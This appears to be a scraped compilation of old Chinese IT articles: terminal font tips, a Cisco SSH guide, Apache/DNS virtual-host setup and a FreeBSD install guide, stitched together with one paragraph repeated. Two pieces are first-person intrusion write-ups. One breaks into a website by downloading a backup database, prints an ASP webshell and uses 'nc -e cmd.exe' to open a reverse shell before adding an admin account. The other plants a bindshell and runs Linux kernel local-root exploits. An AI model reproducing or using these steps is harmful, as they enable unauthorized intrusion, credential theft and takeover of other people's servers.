在终端的菜单上：选[编辑]-》配制文件-》编辑-》Default=》编辑=》General中，Use the same font as other applications前面的小方框里面的勾去掉，然后把字体设置为simsun。就OK了。极为漂亮。

13.kde的终端字体，我们也可以用上面的方法。不过有点不同。

在kde桌面的菜单上，点[系统工具]=》终端，在其菜单上，点[设置]-》字体=》
我们先随便选一个字体，然后就应用一下。我们还要重复操作一次这个过程，只是这次，我们要把字体设置成为simsun。为什么这样做，试一下就明白了。设置一下，然后我不要忘记点[设置]=》保存。

这样kde的终端字体也极其美观。

作者：h4k.b4n

因为FC4的GCC太他妈的高级了!导致我口爱的Realplayer不能够编译成功!幸亏有APT网上更新,要不然就死悄悄了!哈哈哈哈!

[root@localhost ~]# apt-get install libc++.so.5
然后会搜索更新列表,从而安装了!这样再安装REAL就OK了!哈哈哈

文章作者：Bluelight


今天终于GK完了
无聊闲逛在网上，意识催魂试的找我要文章...
哈~发现一迷信网站，不爽...
（入侵需要理由吗？不需要吗？需要吗？....）

用
telnet www.xxx.com 80

get enter

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Wed, 08 Jun 2005 11:56:00 GMT
Content-Type: text/html
Content-Length: 87

<html><head><title>Error</title></he
</html>

失去了跟主机的连接。

F:\Documents and Settings\lu\桌面>

看到没，获得很多有用的信息哦

先去WEB上看看有没有什么漏洞

哈！发现DVBBS7.1 论坛

前几天有朋友告诉我件事情，说有许多白痴管理员用备分的日期做备分数据库的名字哦！试试看！

dvbbs7.1 是4月6日更新的，他用该用200504**.mdb做名字来命名以前的旧数据库！
没办法，试试！

http://www.xxxx.com/bbs/databackup/20050406.mdb
http://www.xxxx.com/bbs/databackup/20050407.mdb
http://www.xxxx.com/bbs/databackup/20050408.mdb
.....
晕..到32了还没出来
管理员不是白痴哦！
http://www.xxxx.com/bbs/databackup/200504.mdb
faint!他不是白痴谁是！
跳出了可爱的下载对话框！

downloading.... 完成！

用辅臣数据库浏览器打开，选择Dv_Log(2586)
字段名选择l_content 关键字添password2

点查询
许多信息出来了哦！
经过筛选
发现一条：
oldusername=%B5%F0%B7%C0&username2=%B5%F0%B7%C0&password2=19841202&adduser=%B5%F0%B7%C0&id=12&Submit=%B8%FC+%D0%C2

哈，想到什么了？登陆啊，不过用户名不知道，是%B8%F0%B7%C9吗~开玩笑，那简单，其实转化这个我用他本身的页面，
在登陆页面上用户名和密码乱添
点登陆
http://www.xxx.com/bbs/showerr.asp?BoardID=0&ErrCodes=10,11&action=%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2

%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2这句话意思是“填写登录信息”

那么就把%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2换成%B5%F0%B7%C0！


提交！看到了吧！用户名是“叼防”
晕！
什么名字啊！不管了，登陆！
成功！呵呵~把老兵的asp站长助手另存为admin_system321.gif

上传！

晕！

一流信息监控系统提醒您：很抱歉，由于您提交的内容中或访问的内容中含有系统不允许的关键词或者您的IP受到了访问限制，本次操作无效，系统已记录您的IP及您提交的所有数据。请注意，不要提交任何违反国家规定的内容！本次拦截的相关信息为：drop table

换海阳top的传，在晕...还是被拦截！

不行！我就不信上不去！

<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
<%
end if %>
<form method="post">
<input type=text name="cmdx" size=60 value="/cmd.exe"><br>
<input type=text name="cmd" size=60><br>
<input type=submit value="cmd"></form>
<textarea readonly cols=80 rows=20>
<%On Error Resume Next
if request("cmdx")="cmd.exe" then
response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall
end if
response.write oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall
%>
</textarea>

保存成为cmd.gif
上传成功！
登陆后台用数据库管理还原成根目录下的admin_system321.asp

_system321.asp">http://www.xxx.com/bbs/admin_system321.asp

登陆，啊...CMD窗口那里显示

无法找到该页
您正在搜索的页面可能已经删除、更名或暂时不可用。
--------------------------------------------------------------------------------

请尝试以下操作：

确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。
如果通过单击链接而到达了该网页，请与网站管理员联系，通知他们该链接的格式不正确。
单击后退按钮尝试另一个链接。
HTTP 错误 404 - 文件或目录未找到。
Internet 信息服务 (IIS)

--------------------------------------------------------------------------------

技术信息（为技术支持人员提供）

转到 Microsoft 产品支持服务并搜索包括“HTTP”和“404”的标题。
打开“IIS 帮助”（可在 IIS 管理器 (inetmgr) 中访问），然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。

把我的SYSTEM32下的CMD.exe用记事本打开，另存为111.gif上传！
在用刚才的方法备分成跟目录下的cmd.exe

把刚才cmd.gif里cmd.exe改成他的绝对路径

全都上传！然后备分！
访问_system321.asp">http://www.xxx.com/bbs/admin_system321.asp
哈！成功！
在用上面的方法把nc传上去！
本地命令提示符执行 nc -vv -l -p 9999
在webshell里执行nc.exe -e cmd.exe 自己IP 9999
NC监听的窗口就出现一个可爱的SHELL

在写个文件如下

echo USER LocalAdministrator>2.txt
echo PASS #l@$ak#.lk;0@P>>2.txt
echo SITE MAINTENANCE>>2.txt
echo -setdomain>>2.txt
echo -Domain=MyFTP^|0.0.0.0^|22^|-1^|1^|0 >>2.txt
echo -DynDNSEnable=0 >>2.txt
echo DynIPName=>>2.txt
echo -SETUSERSETUP>>2.txt
echo -IP=0.0.0.0>>2.txt
echo -PortNo=22>>2.txt
echo -User=tyrant>>2.txt
echo -Password=19851011>>2.txt
echo -HomeDir=c:\>>2.txt
echo -Maintenance=System>>2.txt
echo -Ratios=None>>2.txt
echo Access=c:\^|RWAMEICDP>>2.txt
echo -GETUSERSETUP>>2.txt

"^"符号的作用相信大家都了解吧！我不罗嗦了。

把上面批处理保存为1.txt

在SHELL中用NC提交

nc 127.0.0.1 43958 <1.txt

回显发现

220 Domain settings saved
200-User=test1
200 User settings saved

成功了！成功添加了用户tyrant密码19851011

登陆对方的ftp
转到system32文件夹下

quote site exec "net.exe user tyrant 19851011 /add"

quote site exec "net.exe localgroup administrators tyrant /add"

quote site exec "net.exe user start telnet"

用tyrant管理员telnet上去
传个批处理开3389

哈...正在连接到...

文章到此结束

信息来源：internet


本来不打算把这个不成功的入侵写出来的，后来有几个朋友想看，既然能在内部交流，也没有什么见不得人的，索性发出来，初学者可以借鉴一点经验，高手可以在此基础上作更多尝试，我也想多学点东西。
27日晚看到天天网的一片报道：中国银行网站再次遭遇克隆 假网站远在北美，
本站转载路径：http://www.coolersky.com/web/news/20050228014041.asp
本来要整理规划的，既然出了这个事情，好歹看看吧。废话不说，开始！
1、收集信息

服务器信息：
Apache/1.3.33  
PHP/4.3.9
网站主文件：
_blank>http://www.banochi.net/english/index.shtml


查看虚假网站，基本没发现什么可用的东西，估计只有记录密码和ip的cgi程序。除了服务器入侵，还可以考虑旁注。
检索其他站点，分析了几个php站点的注入，没太多利用的地方。想起phpbb的洞洞，写段代码检索一下viewtopic.php文件，找到一个phpbb2.0.10入侵点

_blank>http://www.bits-clsu.org/forum/viewtopic.php?t=1


事后才想起可以用旁注工具直接来检索，反正都一样。
2、上传木马
利用phpbb的洞，漏洞介绍“phpBB远程任意SQL注入漏洞”，“phpbb<2.0.11程序的sql注入漏洞分析”上传php后门。
3、生成bindshell
我还在看文件的时候，Edward就已经做了个bindshell出来，呵呵！基本方法：
上传bindshell.c

gcc -o /tmp/bind bindshell.c
/tmp/bind


nc上去看看，还是在shell下比较方便。

nc -vv 216.22.48.72 7758


4、采集系统信息
拿到webshell后就可以获得一些基本的信息包括passwd、httpd.conf等等，检索到虚假网站的绝对路径/home/banochin/public_html/，在webshell中查看文件创建的时期是服务器时间2004-12-15，在其cgi-bin目录下有如下文件

文件   创建日期       最后修改       大小   属性  
[member]   2005-02-21 21:39:03 2005-02-21 21:39:03 <dir> 0700
errlog.dat 2005-02-28 00:32:22 2005-02-28 00:32:22 140.186 KB 0600
id.dat   2005-02-24 10:48:35 2005-02-24 10:48:35 1.727 KB 0600
index.htm 2004-12-15 03:19:51 2004-12-15 03:19:51 0.697 KB 0644
pwd.dat   2005-02-25 00:36:15 2005-02-25 00:36:15 0.170 KB 0600
pwdbak.dat 2004-12-15 03:24:17 2004-12-15 03:19:55 0.516 KB 0600
security.cgi 2004-12-15 03:24:03 2004-12-15 03:20:00 44.363 KB 0700
visemailer.cgi 2004-12-15 03:24:04 2004-12-15 03:20:02 3.554 KB 0700


可以看到最后记录的密码日期是2月25日，而浏览目录后发现还包括了很多其他语言的中国银行网站内容，但基本都是html文件，想必是从中国银行直接webdump下来的。
内核信息，因为我们对其目录没有写权限，接着要做的就是提权了。前后大概用了1小时左右，而剩下的提权工作却花了我1天多的时间，结果还是没搞定，郁闷！

uname -r
2.4.20-021stab022.11.777-enterprise


5、本地提升权限测试
增加环境变量
export PATH=/usr/bin:$PATH
否则会出现collect2: cannot find `ld'错误！
（1）Linux Kernel moxa串行驱动BSS溢出漏洞
grsecurity 2.1.0 release / 5 Linux kernel advisories
URL：
_bug&do=view&bug_id=7446&keyword=" target=_blank>http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7446&keyword=
_blank>http://lists.netsys.com/pipermail/full-disclosure/2005-January/030660.html
文件：
_and_patches.tgz" target=_blank>http://grsecurity.net/~spender/exploits_and_patches.tgz
测试：

wget _and_patches.tgz" target=_blank>http://grsecurity.net/~spender/exploits_and_patches.tgz
tar -zxvf exploits_and_patches.tgz
cd exploits_and_patches
make alloc=0x100000
------------------------------------------------------------------------
nasm -f elf -DALLOCATE=32482374 mlock-dos.S
make: nasm: Command not found
make: *** [ all ] Error 127
------------------------------------------------------------------------


结论：
缺少nasm，即使上传rpm也不能够执行安装！
（2）Linux Kernel uselib()特权提升漏洞
Linux kernel sys_uselib local root vulnerability
URL：
_bug&do=view&bug_id=7326&keyword=" target=_blank>http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7326&keyword=
_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=110513415105841&q=raw
_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&w=2
_blank>http://isec.pl/vulnerabilities/isec-0021-uselib.txt
文件：
_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&q=p3
测试：

gcc -O2 -fomit-frame-pointer elflbl_v108.c -o elflbl_v108
------------------------------------------------------------------------
elflbl_v108.c: In function `check_vma_flags':
elflbl_v108.c:545: warning: deprecated use of label at end of compound statement
------------------------------------------------------------------------
./elflbl_v108
------------------------------------------------------------------------
child 1 VMAs 0
[+] moved stack bff73000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc7c00000 - 0xcf707000
Wait... -Segmentation fault
-------------------------------------------------------------------------
gcc -O2 -fomit-frame-pointer elflbl_v109.c -o elflbl_v109
./elflbl_v109
------------------------------------------------------------------------
[+] SLAB cleanup
[-] FAILED: get_slab_objs: /proc/slabinfo not readable? (No such file or directory)
sh: line 9: 24080 Killed         ./elflbl_v109
------------------------------------------------------------------------


（3）Linux内核本地整数溢出和内存泄露漏洞
fun with linux kernel
URL：
_bug&do=view&bug_id=7269&keyword=" target=_blank>http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7269∓keyword=
_blank>http://marc.theaimsgroup.com/?l=full-disclosure&m=110374209001676&w=2
测试：

gcc -o vc vc_resize.c
./vc_resize
------------------------------------------------------------------------
open: No such device or address
------------------------------------------------------------------------
gcc memory_leak.c -o memory_leak
------------------------------------------------------------------------
memory_leak.c:80:2: warning: no newline at end of file
------------------------------------------------------------------------


（4）Linux Kernel do_mremap VMA本地权限提升漏洞
Linux kernel do_mremap VMA limit local privilege escalation
URL：
_bug&do=view&bug_id=6102&keyword=%CC%E1%C9%FD" target=_blank>http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=6102&keyword=%CC%E1%C9%FD
_blank>http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
文件：
_pte.c" target=_blank>http://rhea.oamk.fi/~pyanil00/temp/mremap_pte.c
测试：

gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte
./mremap_pte
------------------------------------------------------------------------
[+] kernel 2.4.20-021stab022.11.777-enterprise vulnerable: YES exploitable YES
MMAP #65530 0x50bfa000 - 0x50bfb000
[-] Failed
------------------------------------------------------------------------


（5）Linux Kernel kmod/ptrace竞争条件权限提升漏洞
linux kmod/ptrace bug - details
URL：
_bug&do=view&bug_id=4570&keyword=%CC%E1%C9%FD" target=_blank>http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=4570&keyword=%CC%E1%C9%FD
_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=104811209231385&w=2
文件：
_blank>http://august.v-lo.krakow.pl/~anszom/km3.c
测试：

gcc -o km3 km3.c
./km3 ?
------------------------------------------------------------------------
Usage: ./km3 [-d] [-b] [-r] [-s] [-c executable]
  -d   -- use double-ptrace method (to run interactive programs)
  -b   -- start bindshell on port 4112
  -r   -- support randomized pids
  -c   -- choose executable to start
  -s   -- single-shot mode - abort if unsuccessful at the first try
------------------------------------------------------------------------
./km3 -s
------------------------------------------------------------------------
Linux kmod + ptrace local root exploit by <anszom@v-lo.krakow.pl>

=> Simple mode, executing /usr/bin/id > /dev/tty
sizeof(shellcode)=95
=> Child process started..........
Failed
------------------------------------------------------------------------


（6）Linux Kernel i386 SMP页错误处理器特权提升漏洞
Linux kernel i386 SMP page fault handler privilege escalation
URL：
_bug&do=view&bug_id=7338" target=_blank>http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7338
_blank>http://marc.theaimsgroup.com/?l=bugtraq&m=110554694522719&w=2
测试：

gcc -o smp smp.c
./smp
------------------------------------------------------------------------
[+] in thread 1 (pid = 5400)
[+] in thread 2 (pid = 5401)
[+] rdtsc calibration: 53428
[+] exploiting race, wait...
[-] unable to exploit race in 30s,
kernel patched or load too high.
------------------------------------------------------------------------


尝试多个本地提权均未能成功！很郁闷！而在测试过程的时候，虚假网站已经被关闭了，虽然文件还在，但是很明显官方已经作了努力，并得到了不错的结果。
6、其他
找了几个linux的键盘记录，都要root权限。而服务器远程连接使用的ssh的，使用sniffer也估计没戏，所以暂时也没什么思路，清理exp、日志文件。
以上是我的一些测试的结果，结果也没有拿到root，不过我整理了一下相关的漏洞，希望对大家以后有些帮助。在站长群里发布了相关的结果，也没有人回话，不知道大家是太忙。。。
文中并未特殊处理漏洞及结果，有兴趣的可以直接利用，不过没必要为难其他站点，我想大家明白我的意思！
折腾了这么久，还有好多工作的事情要做！希望不会被老板说，呵呵！
最后感谢Edward、老黑及几位公司的高人

此日志的浏览权限已被作者锁定，请同作者联系，发送短消息,如果你的身份符合作者的要求，点击此处可以进行浏览

来源：≮ CISCO 补习班≯


1、前言

江西省IP网络中采用了大量的Cisco路由器。管理员通常采用Telnet远程登录的方式对路由器进行日常维护。由于Telnet、FTP等网络服务程序在网络中采用明文传送口令和数据，其安全性无法得到有效的保障。管理员的用户名和密码一旦被别有用心的人截获，后果将不堪设想。因此如何实现Cisco路由器的安全登录成为网络日常维护工作中首要解决的问题。本文利用Cisco路由器对SSH的支持，通过SSH实现了对路由器的安全登录。
SSH的英文全称是Secure Shell，是由芬兰的一家公司开发的。SSH由客户端和服务端的软件组成，有1.x和2.x两个不兼容的版本。SSH的功能强大，既可以代替Telnet，又可以为FTP、POP3和PPP提供一个安全的“通道”。使用SSH，可以把传输的所有数据进行加密。即使有人截获到数据也无法得到有用的信息。同时，数据经过压缩，大大地加快传输的速度。
本文将详细介绍在Cisco路由器上用SSH实现安全登录的配置方法。该方法简单易行，安全性高，适于在网络维护工作中推广使用。

2、在Cisco路由器上配置SSH服务

在Cisco路由器产品系列中只有7200系列、7500系列和12000系列（GSR）等高端产品的IOS支持SSH。一般支持SSH的IOS版本文件名中都带有K3或者K4字样，K3 代表56bit SSH 加密，K4代表168bit SSH加密。如我省省网GSR 12016和12008上用的IOS 就是一个支持56bit SSH 加密的版本。目前Cisco的产品只支持SSH-1，还不支持SSH-2。下面以GSR 12008为例详细介绍SSH-1的配置方法（斜体字为配置输入的命令）：
① 配置hostname和ip domain-name：
Router#configure terminal
Router(config)#hostname TEST-GSR12008
TEST-GSR12008(config)#ip domain-name jx.cn.net
② 配置登录用户名和密码（以本地认证为例）：
TEST-GSR12008(config)#username test password 0 test
注：添加一个用户：test，口令：test
TEST-GSR12008(config)#line vty 0 4
TEST-GSR12008(config-line)#login local
在这两部分做完以后，用show run命令就能够看到：
hostname TEST-GSR12008
!
boot system flash gsr-k3p-mz.120-14.S.bin
enable secret 5 $1$DMyW$gdSIOkCr7p8ytwcRwtnJG.
enable password 7 094F47C31A0A
!
username test password 7 0835495D1D
clock timezone PRC 16
redundancy
  main-cpu
  auto-sync startup-config
!
!
!
!
ip subnet-zero
no ip finger
ip domain-name jx.cn.net
ip name-server 202.101.224.68
ip name-server 202.101.226.68
!
③ 配置SSH服务：
TEST-GSR12008(config)#crypto key generate rsa
The name for the keys will be: TEST-GSR12008.jx.cn.net
注：SSH的关键字名就是hostname + . +ip domain-name
Choose the size of the key modulus in the range of 360 to 2048 for your
  General Purpose Keys. Choosing a key modulus greater than 512 may take
  a few minutes.

How many bits in the modulus [512]: 注：选择加密位数，用默认就行了
Generating RSA keys ...
[OK]

TEST-GSR12008(config)#end
TEST-GSR12008#write
Building configuration...
这时候用show run命令可以看到：
ip subnet-zero
no ip finger
ip domain-name jx.cn.net
ip name-server 202.101.224.68
ip name-server 202.101.226.68
ip ssh time-out 120
ip ssh authentication-retries 3
!
用命令show ip ssh也能看到：
SSH Enabled - version 1.5
Authentication timeout: 120 secs; Authentication retries: 3
现在SSH服务已经启动，如果需要停止SSH服务，用以下命令：
TEST-GSR12008(config)#crypto key zeroize rsa
④设置SSH参数
配置好了SSH之后，通过show run命令我们看到SSH默认的参数：超时限定为120秒，认证重试次数为3次，可以通过下面命令进行修改：
TEST-GSR12008(config)#ip ssh {[time-out seconds]} | [authentication-retries interger]}
如果要把超时限定改为180秒，则应该用：
TEST-GSR12008(config)# ip ssh time-out 180
如果要把重试次数改成5次，则应该用：
TEST-GSR12008(config)# ip ssh authentication-retries 5
这样，SSH已经在路由器上配置成功了，就能够通过SSH进行安全登录了。

信息来源：ChinaITLab收集整理


配置几个简单的虚拟主机，DNS 服务器IP为169.254.1.189例我公司的域名为:zzvcom.com.我想配置以下几个服务器为：
　　
　　ftp.zzvcom.com,mail.zzvcom.com,kuanping.zzvcom.com,soft.zzvcom.com,
　　xiaoshou.zzvcom.com,cpzz.zzvcom.com,net.zzvcom.com,yanfa.zzvcom.com.
　　先安装RPM域名解析软件named,再下载apache.tar.gz
　　
　　#tar –zxvf apache.tar.gz
　　#cd apache
　　#./configure –prefix=/usr/local/apache
　　#make;make install;make clean
　　
　　#vi /usr/local/apache/conf/httpd.conf
　　
　　ServerName 169.254.1.189
　　NameVirtualHost 169.254.1.189
　　<VirtualHost 169.254.1.189>
　　ServerName ftp.zzvcom.com
　　DocumentRoot /www/ftp
　　TransferLog logs/ftp_access_log
　　</VirtualHost>
　　
　　<VirtualHost 169.254.1.189>
　　ServerName mail.zzvcom.com
　　DocumentRoot /www/mail
　　TransferLog logs/mail_access_log
　　</VirtualHost>
　　
　　<VirtualHost 169.254.1.189>
　　ServerName kuanping.zzvcom.com
　　DocumentRoot /www/kuanping
　　TransferLog logs/kuanping_access_log
　　</VirtualHost>
　　
　　<VirtualHost 169.254.1.189>
　　ServerName soft.zzvcom.com
　　DocumentRoot /www/soft
　　TransferLog logs/soft_access_log
　　</VirtualHost>
　　
　　<VirtualHost 169.254.1.189>
　　ServerName xiaoshou.zzvcom.com
　　DocumentRoot /www/xiaoshou
　　TransferLog logs/xiaoshou_access_log
　　</VirtualHost>
　　
　　<VirtualHost 169.254.1.189>
　　ServerName cpzz.zzvcom.com
　　DocumentRoot /www/cpzz
　　TransferLog logs/cpzz_access_log
　　</VirtualHost>
　　
　　<VirtualHost 169.254.1.189>
　　ServerName net.zzvcom.com
　　DocumentRoot /www/net
　　TransferLog logs/net_access_logbr />　　</VirtualHost>
　　
　　<VirtualHost 169.254.1.189>
　　ServerName yanfa.zzvcom.com
　　DocumentRoot /www/yanfa
　　TransferLog logs/yanfa_access_log
　　</VirtualHost>
　　
　　#mkdir /www
　　#cd /www
　　#mkdir ftp mail soft xiaoshou net yanfa cpzz kuanping
　　
　　分别在/www/ftp /www/mail /www/soft /www/xiaoshou /www/net /www/yanfa /www/kuanping /www/cpzz目录下放一个各自的主页（index.html），并将其属性设为755.
　　
　　#/usr/local/apache/bin/apachectl configtest
　　#/usr/local/apache/bin/httpd -S
　　
　　若一切都OK，就可以运行以下命令（启动apache）
　　
　　#/usr/local/apache/bin/apachectl start
　　
　　#vi /etc/named.conf
　　
　　在尾部加上如下几行
　　
　　zone "1.254.169.in-addr.arpa" in {
　　type master;
　　file "db.1.254.169";
　　allow-update { none; };
　　};
　　
　　zone "zzvcom.com" {
　　type master;
　　file "zzvcom.coms";
　　allow-update { none; };
　　};
　　
　　#vi /var/named/db.1.254.169
　　@ IN SOA localhost. root.localhost. (
　　1997022700 ; Serial
　　28800 ; Refresh
　　14400 ; Retry
　　3600000 ; Expire
　　86400 ) ; Minimum
　　IN NS localhost.
　　
　　1 IN PTR localhost.
　　189 IN PTR ftp.zzvcom.com
　　
　　#vi /var/named/zzvcom.coms
　　@ IN SOA dns.zzvcom.com. root.zzvcom.com. (
　　947579188 ; Serial Number
　　10800 ; Refresh after 3 hours
　　3600 ; Retry after 1 hour
　　604800 ; Expire after 1 week
　　86400 ) ; Minimum TTL of 1 day
　　
　　@ IN NS dns.zzvcom.com.
　　localhost IN A 127.0.0.1
　　ftp IN A 169.254.1.189
　　mail IN CNAME ftp
　　kuanping IN CNAME ftp
　　xiaoshou IN CNAME ftp
　　net IN CNAME ftp
　　soft IN CNAME ftp
　　yanfa IN CNAME ftp
　　cpzz IN CNAME ftp
　　
　　#vi /etc/resolv.conf
　　
　　domain zzvcom.com
　　nameserver 169.254.1.189
　　
　　#/etc/rc.d/init.d/named start
　　
　　用nslookup检验一下DNS的正确性
　　
　　在我们客户端(WINDOWS下)设置DNS为169.254.1.189（只要这一个，因为我们的DNS服务器还不是一个公网IP，且没有申请为DNS服务器）
　　
　　在IE里打开这个网址 ftp.zzvcom.com soft.zzvcom.com 若正确，所有实验就成功了。

信息来源：ChinaITLab收集整理


对于许多电脑用户来说，FreeBSD还是一个比较陌生的系统。本文将以FreeBSD 4.7 Release为例，一步一步地带您安装一份完整的FreeBSD操作系统。
　　
　　安装前的准备
　　
　　FreeBSD对于系统的硬件适应能力比较强(相比Linux可能稍差，特别是对于新的显示卡的支持；但对于服务器常用的硬件，包括SCSI设备的支持是相当完善的)。IA平台的多数处理器，下至386，上至Pentium-4及其兼容的CPU，都能够运行FreeBSD。为了有效地安装、运行FreeBSD，我个人推荐安装FreeBSD的系统至少要有2GB的剩余硬盘空间，以及至少64MB内存。这样配置的电脑在今天是很容易找到的。考虑到FreeBSD一般都被配置作为服务器使用，上面的配置要求显然是很容易做到的。
　　
　　对于服务器来说，双启动是不合适的(服务器往往要求持续、长时间工作，而切换操作系统无疑需要停止服务。此外，双启动的系统稳定性比较差，某个操作系统的崩溃很可能破坏另一个操作系统)。FreeBSD支持和其他操作系统并存、并在开机时通过菜单选择使用的操作系统，但我个人非常反对以这种方式使用FreeBSD。
　　
　　那么，让我来从头到尾地安装一台FreeBSD服务器，并说明FreeBSD的安装。为了安装FreeBSD，我准备了这样一台电脑：
　　
　　CPU: Pentium II-233, 内存64MB, 硬盘(IDE)6GB, PS/2键盘、鼠标，20x光驱、无软驱、RealTek8139网卡(TP-LINK)。
　　
　　上述配置在今天是很容易做到的。当然，就服务器而言，这个配置确实惨了点，不过FreeBSD在上面运行，并承担数据库、动态网页等服务是完全没有问题的。
　　
　　首先是准备FreeBSD的安装盘。FreeBSD有许多种安装方式，最简单易行的方式就是使用光盘安装；不过尽管如此，在没有软驱、光驱的计算机上也是可以通过BOOTP服务采用远程引导的方式来安装的。考虑到这种情况比较少见(笔者曾经在一台没有软驱、光驱的计算机上成功安装过FreeBSD，但方法是将硬盘挂接在另一台计算机上，而不是通常的BOOTP)，在此不介绍。
　　
　　为了安装FreeBSD，我准备了一张空的CD-R。安装FreeBSD最少只需要2张1.44MB的空白软盘(其余文件使用FTP获得)，而安装FreeBSD只需要第一张光盘就够了。除非你的计算机很慢，或无法接入Internet，否则一般情况只需要下载第一张光盘的镜像。由于网络中心的FTP上提供了FreeBSD 4.6全部四张光盘的镜像，以及4.6.2的前两张光盘，因此我直接下载并刻了后者的第一张光盘。
　　
　　打开计算机，进入BIOS Setup。在其中选择让计算机从光盘启动(这是关键步骤，虽然FreeBSD也可以从DOS环境中启动安装过程，但那可能会有一些问题)、禁用一切用不到的设备，包括串口、并口、软驱控制器(这么做主要是为了提高性能，因为外围设备可能会向主机发送中断请求，而用不到的设备发送请求除了浪费CPU的时间之外没有什么其他作用)。
　　
　　FreeBSD安装光盘上的系统使用的是GENERIC内核，这个内核可以适应绝大多数系统的情况。当然，正如他的名字“GENERIC(通用)”，这也带来的较低的性能，例如，这个内核不能够发挥双CPU的能力，等等。不过既然安装过程只会进行一次，我们也不必过分地在意它。
　　
　　安装光盘启动(对于软盘启动来说，是根据提示将两张软盘的内容全部加载到内存中)完成后，首先出现的是配置内核。
　　
　　配置内核通常不是必需的，因为FreeBSD能够自动识别硬件。然而，如果你的硬件配置比较特殊(例如，有两块网卡，使用特殊的IRQ，比较古老，等等)，那么可能需要手工配置一下内核。对于绝大多数情况来说，只要删除那些用不到的设备，就能够正常完成FreeBSD的安装；如果你对于自己的硬件不熟悉，这一过程甚至可以跳过。
　　
　　我个人比较喜欢删除不用的设备，于是选择Visual方式，将不需要的设备统统删除。最后，按Q保存配置，进入FreeBSD的安装程序sysinstall(8)。
　　
　　FreeBSD基本系统的安装
　　
　　作为一个服务器管理员，经常性的服务器软件更新是必不可少的。FreeBSD提供了非常便捷的升级方式——cvsup，它可以从FreeBSD中央cvsup服务器，或某个cvsup镜像上获取FreeBSD的部分或全部源代码，而且，它只下载那些修改过的源代码，并且可以根据需要选择适合你的版本(使用-STABLE可以提供较好的稳定性以及操作系统的最新特性，多数管理员都会选择这个；使用-RELEASE能够获得成熟产品的品质，尽管话是这样说，但实际上选择这一分支的人很少；使用-CURRENT的用户主要是参与FreeBSD开发的人员，这个分支包含了所有即将进入-STABLE分支的新特性，但不要指望这个分支能够提供必要的稳定性保证，也不要指望它能够带来很好的性能，但所有的安全问题都是首先在这个分支内修正的。我将在后面详细介绍这些)。
　　
　　一旦最初的内核配置完成，它就会立即启动，并根据配置文件启动sysinstall(8)。我们将看到一个标准的文字模式配置界面，这有点类似于早期Visual Basic For MS-DOS编写的应用程序的界面。
　　
　选择Standard进入标准的FreeBSD安装过程。首先是对磁盘进行分区。
　　
　　FreeBSD对于磁盘的管理和Windows有比较大的差别。一个磁盘上通常有一个Partition就够了，而一个Partition又可以分成若干个slice，并加以标记(label)。实际上，FreeBSD的slice基本上可以等同于Windows的磁盘分区，或卷的概念。
　　
　　为了保证与FreeBSD共存的系统能够启动，默认情况下FreeBSD会保留一部分磁盘空间(64 cyl)。对于单一操作系统的计算机来说，这是完全没有必要的。分区时按Shift+F可以选择不使用这个特性，不过这种情况下，除了彻底毁掉这套FreeBSD之外，恐怕就没有其他方法能够从这块硬盘上引导其他操作系统了。为了完全使用磁盘空间，我选择了不保留预留空间。



随后是在这个Partition上创建slice。和Linux的情况类似，FreeBSD也使用单独的交换区。这种设计可以避免碎片，也防止了对文件系统的影响，性能较好。通常情况下交换分区是内存的2-2.5倍，这足以应付日常的突发事件。/var用于保存那些不在集群中共享的文件，/tmp用来保存临时文件，而/usr用来保存那些需要在集群中同步的文件。/就不用说了，它保存的是启动系统需要的文件。
　　
　　通常给/分配的空间是128MB，/tmp和/var各256MB，剩下的都分给/usr。不过也有例外，如果打算做一个大型的邮件系统，则/var要大一些(通常邮件系统依赖/var来保存邮件)。当然，各个slice可以mount到不同的地方(例如，你可以把曾经的/usr变成/var)，不过最开始配置好可以减少很多麻烦。



当然，偷懒的方法也是有的。在没有slice，或没有完全配完slice的情况下按A，系统会给出一组(或对剩下的label)默认的配置。如果你打算单纯提供Web+数据库这样的服务，完全可以直接接受这组配置。
　　
　　从FreeBSD 4.x开始，ufs支持了一个叫做SoftUpdates的技术。SoftUpdates的主要设计目标是提高文件系统性能。除了/所在的slice之外，所有的ufs slice都应打开SoftUpdates，这样对于提高系统整体性能很有好处。(/虽然也是ufs slice，但打开SoftUpdates会造成系统不稳定——FreeBSD文档如此警告，而笔者确实也吃过这个亏。不过，由于/的内容不需要经常变化，不打开SoftUpdates和打开了SoftUpdates几乎没有性能上的差别) 。SoftUpdates可以随时通过tunefs(8)来打开或关闭。在label(8)程序中，打开SoftUpdates的标志是文件系统显示为ufs+s。
　　
　　之后是选择安装介质和要装的Distribution。它提供了几组常见的情况。Minium安装最小系统，包括一些基本的Unix程序。Developer包括了一些开发工具；X-Developer和Kernel-Developer分别是X和内核开发人员用的。此外还有可选的ports，它可以帮助我们来安装应用程序。
　　
　　当然，偷懒的方法也是有的。在没有slice，或没有完全配完slice的情况下按A，系统会给出一组(或对剩下的label)默认的配置。如果你打算单纯提供Web+数据库这样的服务，完全可以直接接受这组配置。
　　
